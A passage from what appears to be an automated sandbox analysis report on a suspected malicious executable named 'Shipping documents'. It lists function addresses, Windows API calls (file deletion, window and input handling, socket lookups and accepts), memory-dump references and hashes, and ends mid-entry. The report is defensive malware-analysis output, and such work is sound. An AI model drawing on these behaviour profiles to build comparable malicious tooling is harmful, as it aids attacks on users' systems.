                                                                                                          • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 3321077145-0
                                                                                                          • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                          • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                          • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                          • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                          Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                          • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 3058430110-0
                                                                                                          • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                          • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                          • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                          • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                          Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 004503C8
                                                                                                          • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                          • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                          • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Proc$Parent
                                                                                                          • String ID:
                                                                                                          • API String ID: 2351499541-0
                                                                                                          • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                          • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                          • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                          • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                          Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                          • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                          • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Peek$DispatchTranslate
                                                                                                          • String ID:
                                                                                                          • API String ID: 1795658109-0
                                                                                                          • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                          • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                          • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                          • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                          Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32 ref: 0047439C
                                                                                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                          • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                          • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2759813231-0
                                                                                                          • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                          • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                          • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                          • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                          Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                          • _wcslen.LIBCMT ref: 00449519
                                                                                                          • _wcslen.LIBCMT ref: 00449526
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend_wcslen$_wcspbrk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2886238975-0
                                                                                                          • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                          • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                                          • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                          • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                                          Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __setmode$DebugOutputString_fprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1792727568-0
                                                                                                          • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                          • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                          • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                          • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                          Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                                          • String ID:
                                                                                                          • API String ID: 2169480361-0
                                                                                                          • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                          • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                          • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                          • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                          Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                            • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                            • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                          • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                          • String ID: cdecl
                                                                                                          • API String ID: 3850814276-3896280584
                                                                                                          • Opcode ID: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                                                                          • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                          • Opcode Fuzzy Hash: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                                                                          • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                          Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                          • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                                          • _memmove.LIBCMT ref: 0046D475
                                                                                                          • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                                          • String ID:
                                                                                                          • API String ID: 2502553879-0
                                                                                                          • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                          • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                                          • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                          • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                                          Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                          • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastacceptselect
                                                                                                          • String ID:
                                                                                                          • API String ID: 385091864-0
                                                                                                          • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                          • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                          • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                          • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                          Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                          • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                          • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                          • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                          Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1358664141-0
                                                                                                          • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                          • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                          • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                          • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                          Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
